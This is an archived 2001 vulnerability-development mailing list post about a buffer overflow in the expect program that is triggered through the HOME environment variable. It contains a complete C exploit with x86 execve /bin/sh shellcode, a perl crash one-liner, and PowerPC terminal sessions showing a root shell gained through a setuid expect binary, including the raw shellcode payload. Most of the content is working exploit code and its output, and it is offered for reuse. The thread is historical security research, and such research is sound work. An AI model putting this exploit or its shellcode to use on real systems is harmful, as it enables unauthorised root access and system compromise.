Vulnerability Development mailing list archives
Re: [Fwd: [Fwd: Returned post for bugtraq () securityfocus com]]
From: Charles Stevenson <core () ezlink com>
Date: Thu, 07 Jun 2001 19:52:55 -0600
F*#! i sent the wrong paste (lol)... yes the easiest expect exploit if it was suid would be to call it directly... ;-) here is the paste i meant to send [-(core@euclid:~/sploits/shellcode/reet)> ./eggshell 512 [ Buffer size: 512 Egg size: 2048 Aligment: 0] [ Address: 0x100111f8 Offset: 0 ] sh-2.05$ export HOME=$EGG sh-2.05$ id uid=1000(core) gid=1000(core) groups=1000(core),4(adm),24(cdrom),29(audio) sh-2.05$ /usr/bin/expect sh-2.05# id uid=0(root) gid=1000(core) groups=1000(core),4(adm),24(cdrom),29(audio) sh-2.05# ps PID TTY TIME CMD 1791 pts/5 00:00:00 sh 1793 pts/5 00:00:00 ps sh-2.05# exit sh-2.05$ echo $HOME ÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûx|Æ2x/?ÿA¼|h¦°Ãÿµ°Ãÿ°Ãÿ?ÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûx8?ð8¦ô8æó|¥"x|ç"x|?:|Ä®|Ä*|ç(P|?*|¤"|¤*|(P|e|cxDÿÿ|£+x|À3x|Æ2x|§:|¥*|c!.|f"|Å!.|¥*xDÿÿ|à;xDÿÿÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûx|Æ2xKÿþý/bin/shZÿÿÿÿÿÿÿÿ Assigning the contents of $EGG to $HOME being the key... sorry folks about the earlier blunder... ;-) Best Regards, Charles Stevenson Charles Stevenson wrote:
Kevin, Here's the PPC shellcode info you asked for: This is mainly a post of my PowerPC exploit efforts... anyways... Just for grins I tested a scenario under Debian PowerPC GNU/Linux with: ii expect5.31 5.31.8-3 A program that "talks" to other programs. [-(core@euclid:~/sploits/shellcode/reet)> sudo chmod 4755 /usr/bin/expect [-(core@euclid:~/sploits/shellcode/reet)> ls -lL /usr/bin/expect -rwsr-xr-x 1 root root 4328 Sep 20 2000 /usr/bin/expect [-(core@euclid:~/sploits/shellcode/reet)> ./eggshell 512 [ Buffer size: 512 Egg size: 2048 Aligment: 0] [ Address: 0x100111f8 Offset: 0 ] sh-2.05$ id uid=1000(core) gid=1000(core) groups=1000(core),4(adm),24(cdrom),29(audio) sh-2.05$ /usr/bin/expect expect1.1> id uid=1000(core) gid=1000(core) euid=0(root) groups=1000(core),4(adm),24(cdrom),29(audio) expect1.2> If you find a program that calls expect suid let me know ;-) Best Regards, Charles Stevenson P.S. the "reet" tools I wrote to add PowerPC support are based on Aleph One's smashstack code. It's available at: http://www.ezlink.com/~core/files/reet.tar.gz (Comments welcome:)I have found an overflow in and coded the exploit code for several versions of /usr/bin/expect... on SCO , linux, and BSD variants. I am unable to think of a situation where this would be useful due to the fact that expect is not suid...can anyone help me determine if this is exploitable to obtain root? Perhaps a suid expect script could be exploited? or maybe something like suid kppp which calls expect as a helper program? [root@linux elguapo]# export HOME=`perl -e 'print "A" x 433'` [root@linux elguapo]# expect Segmentation fault (core dumped) -Kevin Finisterre dotslash () snosoft com --------------54785D81E19EEAA4D65A5A40 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii; name="expect.c" Content-Disposition: inline; filename="expect.c" //krfinisterre () checkfree com or dotslash () snosoft com //this is output from my brute script... //722 //Stack pointer: 0xbffffa18 // Offset: 0x2d3 // Return addr: 0xbffff745 //stack/brute.sh: line 11: 2190 Illegal instruction (core dumped) $3 $L //723 //Stack pointer: 0xbffffa18 // Offset: 0x2d4 // Return addr: 0xbffff744 //sh-2.04# //note that I was root when I ran this ... expect is not suid #define BUFFERSIZE 533 unsigned long sp(void) { __asm__("movl %esp, %eax"); } int main(int argc,char **argv) { char hell[] = "\x29\xc0" "\x29\xc0" "\xb0\x47" "\x29\xdb" "\xb3\x0c" "\x89\xd9" "\xcd\x80" "\x5e" "\x29\xc0" "\x88\x46\x07" "\x89\x46\x0c" "\x89\x76\x08" "\xb0\x0b" "\x87\xf3" "\x8d\x4b\x08" "\x8d\x53\x0c" "\xcd\x80" "\xe8\xe3\xff\xff\xff" "\x2f\x62\x69\x6e\x2f\x73\x68"; int i; int offset; long esp; long ret; long *addr_ptr; char *buffer, *ptr; offset = atoi(argv[1]); esp = sp(); ret = esp-offset; if(!(buffer = malloc(BUFFERSIZE))) { printf("oops\n"); exit(-1); } ptr = buffer; addr_ptr = (long *)ptr; for (i=0; i<BUFFERSIZE; i+=4) *(addr_ptr++) = ret; for (i=0; i<BUFFERSIZE/2; i++) buffer[i] = '\xeb02'; ptr = buffer + ((BUFFERSIZE/2) - (strlen(hell)/2)); for(i=0; i<strlen(hell); i++) *(ptr++) = hell[i]; buffer[BUFFERSIZE-1] = 0; setenv("HOME", buffer, 1); execlp("/usr/bin/expect", 0); } --------------54785D81E19EEAA4D65A5A40--
Current thread:
- [Fwd: [Fwd: Returned post for bugtraq () securityfocus com]] KF (Jun 05)
- Re: [Fwd: [Fwd: Returned post for bugtraq () securityfocus com]] Kevin J. Menard, Jr. (Jun 05)
- Re: [Returned Post...Expect overflows KF (Jun 05)
- Re: [Fwd: [Fwd: Returned post for bugtraq () securityfocus com]] Charles Stevenson (Jun 07)
- Re: [Fwd: [Fwd: Returned post for bugtraq () securityfocus com]] Charles Stevenson (Jun 07)
- Re: Returned post ... Expect overflows KF (Jun 08)
- Re: [Fwd: [Fwd: Returned post for bugtraq () securityfocus com]] Charles Stevenson (Jun 07)
- Expect Overflow (Continued) Charles Stevenson (Jun 08)
- Re: [Fwd: [Fwd: Returned post for bugtraq () securityfocus com]] Kevin J. Menard, Jr. (Jun 05)